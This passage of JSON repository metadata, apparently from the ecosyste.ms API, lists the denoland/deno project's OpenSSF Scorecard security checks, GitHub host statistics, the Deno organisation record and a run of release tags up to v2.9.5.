hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/